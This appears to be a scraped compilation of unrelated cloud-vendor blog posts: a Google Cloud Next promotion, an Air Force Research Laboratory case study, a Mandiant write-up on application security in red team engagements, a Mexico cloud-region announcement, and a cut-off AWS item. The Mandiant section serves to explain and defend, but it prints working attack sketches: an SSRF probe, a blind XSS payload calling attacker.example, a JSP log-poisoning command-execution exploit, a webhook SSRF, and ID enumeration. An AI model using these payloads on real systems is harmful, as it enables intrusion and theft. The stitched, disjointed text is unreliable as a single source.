Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.
Partner Summit is your exclusive opportunity to:
Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.
Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.
Google Cloud Next returns to Las Vegas, April 9–11, 2025* and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be even bigger and better than ever.
Join us for an unforgettable week of hands-on experiences, inspiring content, and problem-solving with our top partners. Seize the opportunity to learn from top experts and peers tackling the same challenges you face day in and day out, and walk away with new ideas, breakthrough skills, and actionable knowledge only available at Google Cloud Next 2025.
Early bird registration is now available for just $999 for a limited time**.
Here’s why you need to be at Next:
Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.
* Select programming to take place in the afternoon of April 8. ** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.
Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.
This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt cutting-edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings, and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.
Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:
Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks: delays in moving and sharing data, limited access to US-based tools, reliance on standard storage and hardware, and a lack of system communications and integrations across third-party infrastructure. As a result, cross-team collaboration and experiment expansion were severely limited and inefficiently tracked. With very little cloud experience, the team was able to create an isolated environment using Google Cloud infrastructure such as Google Compute Engine, Cloud Workstations, and Cloud Run to build analytic pipelines that test, store, and analyze data in an automated, streamlined way. That data pipeline automation paved the way for further exploration and expansion of a use case that had never before been attempted.
Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process made it difficult to provide scalable, secure access to important content and information for users across different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application on Google App Engine, integrated with Google Workspace and Apps Script, to capture usage metrics for future hardware investment decisions and automate administrative tasks that were taking time away from research. The result: significantly faster changes without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable architecture with built-in SSO that helped streamline internal content for multiple labs.
Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud, uses infrastructure services such as Cloud Run, Cloud SQL, and GKE, and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.
By leveraging Google Cloud’s BigQuery and other analytics tools, the app provides personalized insights and recommendations for fatigue interventions and predictions, helping improve cognitive effectiveness and overall well-being for Airmen.
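To make the analytics layer concrete, here is a minimal sketch of the kind of roll-up query such an app might run with the BigQuery Python client. The project, dataset, and column names are hypothetical illustrations, not the FOCUS app’s actual schema.

from google.cloud import bigquery

client = bigquery.Client(project="focus-app")  # hypothetical project ID

# Weekly roll-up of wearable metrics into per-user readiness features
# (table and column names are illustrative only).
query = """
    SELECT user_id,
           AVG(resting_heart_rate) AS avg_rhr,
           AVG(sleep_minutes) / 60 AS avg_sleep_hours
    FROM `focus-app.wearables.garmin_daily`
    WHERE reading_date >= DATE_SUB(CURRENT_DATE(), INTERVAL 7 DAY)
    GROUP BY user_id
"""
for row in client.query(query).result():
    print(row.user_id, round(row.avg_rhr, 1), round(row.avg_sleep_hours, 1))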
Streamlined AI model development with Vertex AI:
The AFRL wanted to replicate the functionality of university HPC clusters, especially because its diverse user base needed extra compute and not everyone was trained on these tools. They wanted an easy GUI and persistent, active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter notebooks through Workbench, along with Compute Engine, Cloud Shell, Cloud Build, and more, to get a head start on a pipeline for sharing, ingesting, and cleaning their code. Access to these resources created a flexible environment where researchers could develop and test models at an accelerated pace.
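For a sense of what this looks like in practice, the sketch below submits a containerized training run with the Vertex AI SDK, giving a researcher HPC-style burst compute directly from a notebook. The project ID, container image, and machine settings are placeholders, not AFRL’s actual configuration.

from google.cloud import aiplatform

aiplatform.init(project="afrl-research", location="us-central1")  # hypothetical project

# Submit a containerized training run; Vertex AI provisions and tears down
# the accelerator-backed machines, so no cluster administration is needed.
job = aiplatform.CustomContainerTrainingJob(
    display_name="materials-model-train",
    container_uri="us-docker.pkg.dev/vertex-ai/training/pytorch-gpu.2-1:latest",  # placeholder image
)
job.run(
    machine_type="n1-standard-8",
    accelerator_type="NVIDIA_TESLA_T4",
    accelerator_count=1,
    replica_count=1,
)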
Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.
Dr. Dan Berrigan
Air Force Research Laboratory
The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.
Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.
Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.
Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost
Executive Summary
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:
Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.
By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.
Introduction
In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.
This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”
The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).
Figure 1: Initial Compromise statistics from the M-Trends report
At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeters to gain a deeper understanding of their security posture. While most infrastructure typically receives a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.
This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
The Role of Application Security in Red Team Assessments
The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.
The AppSec specialist will often get involved as early as possible in an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping the application inventory and identifying vulnerabilities within the components of web applications and application programming interfaces (APIs) exposed to the internet.
While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.
Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:
Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation
Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators perform most of the remaining activities at this point, the AppSec consultants stay close to the engagement and often step in to support internal exploitation efforts. For example, applications that are only accessible internally generally receive far less scrutiny and are assessed much less frequently than externally accessible assets.
By incorporating AppSec expertise, we’ve seen a marked increase in engagements where our Red Team gained a significant advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This overall approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.
Case Studies: Demonstrating the Impact of Application Security Support
In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.
These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.
Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access
Context
A company in the energy sector engaged Mandiant to assess its cybersecurity team’s detection, prevention, and response capabilities. Because the organization had grown significantly in recent years following multiple acquisitions, Mandiant suggested an increased focus on the external perimeter. This would allow the organization to measure the subsidiaries’ external security posture against the parent organization’s.
Target of Interest
Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.
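To make the attack shape concrete, here is a hedged sketch of how such an HTML-injection-to-SSRF probe might look. The endpoint, parameter, and header names are hypothetical; only the technique mirrors the engagement.

import requests

API = "https://partner-api.example.com"  # hypothetical API host
API_KEY = "<key recovered from the decompiled app>"  # placeholder

# Inject an iframe into a field that the service renders into a PDF.
# If the HTML-to-PDF engine fetches the URL server-side, the internal
# page's contents are embedded in the returned document: full-read SSRF.
payload = '<iframe src="https://internal-host.corp.example/" width="800" height="1000"></iframe>'
resp = requests.post(
    f"{API}/v1/reports/pdf",
    headers={"X-Api-Key": API_KEY},
    json={"title": payload},
    timeout=30,
)
with open("out.pdf", "wb") as f:
    f.write(resp.content)  # inspect the PDF for internal content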
Vulnerability Identification
During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.
Exploitation
With no public proof-of-concept exploits available, the team searched for the DLL without success until the file was found in VirusTotal’s public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function and providing all the necessary components for a successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability affecting the internal application. This attack chain led to a reliable foothold in the parent organization’s internal network.
Figure 2: HTML to PDF Server-Side Request Forgery to deserialization
Takeaways
The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.
Breaking Barriers: Blind XSS as a Gateway to Internal Networks
Context
A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.
Target of Interest
During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. Leveraging the Wayback Machine on the CRM hostname, a legacy endpoint was discovered, which appeared obsolete but still accessible without authentication.
Vulnerability Identification
Despite not being accessible through the CRM’s user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method allows an adversary to temporarily hijack the targeted user’s browser tab, allowing attackers to perform actions on behalf of the user. Moments later, the team received a notification that the payload successfully executed within the context of a user browsing an internal customer support administration panel.
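A minimal sketch of the injection step follows, assuming a hypothetical form endpoint and field names; the hosted hook.js would carry the post-exploitation logic described above.

import requests

TARGET = "https://crm.example.com/legacy/support"  # hypothetical legacy endpoint

# Blind XSS: there is no immediate feedback. The payload fires later, when
# an internal user views the ticket, loading attacker-hosted JavaScript
# that runs in that user's browser session.
payload = '"><script src="https://attacker.example/hook.js"></script>'
requests.post(
    TARGET,
    data={"subject": "Support request", "message": payload},
    timeout=15,
)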
The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload’s execution context and assess the data accessible within this internal application. The analysis revealed references to Apache Tapestry framework version 3, a framework initially released in 2004. Shortly after identifying the internal application’s framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). The Apache Software Foundation assigned CVE-2022-46366 for this RCE.
Exploitation
The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.
Figure 3: Remote code execution staged with blind cross-site scripting
Takeaways
This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.
Logger Danger: From Log Files to Unauthorized Cloud Access
Context
An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group, focused on breaching externally exposed systems and services. Those groups, who typically resell illegitimate access to compromised victims’ environments, were previously identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to help support assessment activities.
Target of Interest
Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application drew additional attention after the discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application’s trial installer, still accessible online despite not being referenced or indexed anywhere else.
Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section on a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin’s functionality included logging performance metrics and stack traces to local files upon encountering unhandled errors. Furthermore, the plugin’s endpoint name was distinctive, making it highly unlikely to be discovered through conventional directory brute-forcing.
Vulnerability Identification
The AppSec Team successfully logged into the organization’s performance monitor plugin by using the default credentials sourced from the administration manual and resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, a log management feature was identified, which allowed authenticated users to manipulate log filenames and directories. The team also observed they could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary file location on the underlying server’s file system.
Exploitation
The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.
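The sketch below illustrates the log-poisoning chain with hypothetical endpoint and parameter names; the real plugin’s interface differed, but the three steps are the same.

import requests

BASE = "https://scm.example.com"  # hypothetical cloud-hosted instance
session = requests.Session()
# (authenticate here with the default credentials from the manual)

# Step 1: point the error log at a JSP file under the web root
# (parameter names are illustrative).
session.post(
    f"{BASE}/monitor/logconfig",
    data={"logDir": "../webapps/ROOT", "logFile": "diag.jsp"},
)

# Step 2: trigger an unhandled exception with JSP code in a parameter,
# so the stack trace, including our input, is written into diag.jsp.
jsp = '<%= new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\\\A").next() %>'
session.get(f"{BASE}/monitor/metrics", params={"range": jsp})

# Step 3: request the poisoned log file; the server executes the JSP.
print(session.get(f"{BASE}/diag.jsp").text)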
Figure 4: Remote code execution through log file poisoning
Takeaways
A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.
Collaborative Intrusion: Webhooks to CI/CD Pipeline Access
Context
A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.
Target of Interest
Most of the interesting applications redirected to the customer’s single sign-on (SSO) provider. However, one application behaved differently. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. With the goal of identifying the application’s underlying technology, the favicon’s hash was calculated and queried using Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, aiding the team in identifying the application’s name and vendor.
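The favicon pivot is reproducible in a few lines of Python: Shodan indexes the MurmurHash3 of the base64-encoded icon (newlines included), so the same value can be computed locally and searched. The hostname and API key below are placeholders.

import base64

import mmh3      # pip install mmh3
import requests
import shodan    # pip install shodan

# Fetch the favicon and compute the hash Shodan indexes: MurmurHash3 over
# the base64-encoded bytes, with the newlines encodebytes() inserts.
resp = requests.get("https://app.example.com/favicon.ico", timeout=10)
favicon_hash = mmh3.hash(base64.encodebytes(resp.content))

api = shodan.Shodan("SHODAN_API_KEY")  # placeholder key
for match in api.search(f"http.favicon.hash:{favicon_hash}")["matches"]:
    print(match["ip_str"], match.get("hostnames"))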
Vulnerability Identification
Once the application’s name was identified, the team visited the vendor’s website and accessed their public API documentation. Among the API endpoints, one stood out—it could be directly accessed on the customer’s application without redirection to the SSO. This API endpoint did not require authentication and only took an incremental numerical ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the API endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered. This application exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.
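The ID-enumeration step itself reduces to a short loop; this sketch uses a hypothetical endpoint and response fields.

import requests

API = "https://app.example.com/api/v1/employees"  # hypothetical endpoint

# The endpoint required no authentication and took a sequential numeric ID,
# so iterating the ID space yields a full employee directory.
directory = []
for emp_id in range(1, 5001):
    r = requests.get(f"{API}/{emp_id}", timeout=10)
    if r.status_code == 200:
        record = r.json()
        directory.append((record.get("email"), record.get("phone")))

print(f"collected {len(directory)} records")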
Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As efforts continued on the internal post-exploitation, the application security consultants shifted their focus to support the Red Team’s efforts within the internal network.
Exploitation
Digging into network shares, the Red Team found credentials for a developer account on an enterprise source control application. The AppSec Team sifted through reconnaissance data and flagged that the same source control application server was exposed externally. The credentials were successfully used to log in, as multi-factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company’s internal Jenkins – an integration commonly employed for facilitating communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook. When manually triggered by the team, this webhook would perform an SSRF to internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030), and ultimately to remote code execution, effectively compromising the organization’s CI/CD pipeline.
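The webhook-as-SSRF primitive can be sketched against the standard GitHub REST API, which exposes both hook creation and a manual test trigger. The host, repository, and internal Jenkins URL below are placeholders, and the sketch covers only the SSRF step, not the subsequent sandbox-bypass exploit.

import requests

GHE_API = "https://git.example.com/api/v3"  # hypothetical GitHub Enterprise host
HEADERS = {"Authorization": "token <developer token from the network share>"}
REPO = "platform/build-config"              # hypothetical repository

# Create a webhook whose delivery URL points at an internal Jenkins
# endpoint; the source control server makes the request on our behalf.
hook = requests.post(
    f"{GHE_API}/repos/{REPO}/hooks",
    headers=HEADERS,
    json={
        "name": "web",
        "config": {"url": "http://jenkins.internal:8080/", "content_type": "json"},
        "events": ["push"],
    },
    timeout=15,
).json()

# Manually fire a test delivery to trigger the server-side request.
requests.post(f"{GHE_API}/repos/{REPO}/hooks/{hook['id']}/tests", headers=HEADERS, timeout=15)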
Figure 5: External perimeter breach via CI/CD SSRF
Takeaways
In this case study, the efficacy of collaboration between the Red Team and the AppSec Team was demonstrated. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, we challenged the misconception that singular critical vulnerabilities are indispensable for reaching objectives. Instead, we revealed the reality where achieving goals often requires innovative detours. In fact, a combination of vulnerabilities or misconfigurations, whether they are discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.
Conclusion
As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.
This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.
Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.
Helping organizations in Mexico thrive in the cloud
Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.
With this new region in Querétaro, Mexico, Google Cloud customers enjoy:
Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.
Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:
“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.
The construction of a new Google Cloud region in Querétaro, Mexico is also welcomed by the Mexican public sector.
“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación
The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.
“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información
And for global companies looking to tap into the Mexican market:
“As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” – Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks
Delivering on our commitment to Latin America
In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.
We’re equally committed to creating new career opportunities for people in Mexico and Latin America. We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.
Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.
Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers, and customers. Ongoing programs include no-cost, localized courses on YouTube, credentials through the Google Cloud Skills Boost platform, community support from Google Developer Groups, and scholarships for the Google Career Certificates, which prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.
This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.
Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.
We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.
Today Amazon Web Services, Inc. (AWS) announced the general availability of Amazon SageMaker partner AI apps, a new capability that enables customers to easily discover, deploy, and use best-in-class machine learning (ML) and generative AI (GenAI) development applications from leading app providers privately and securely, all without leaving Amazon SageMaker AI, so they can develop performant AI models faster.
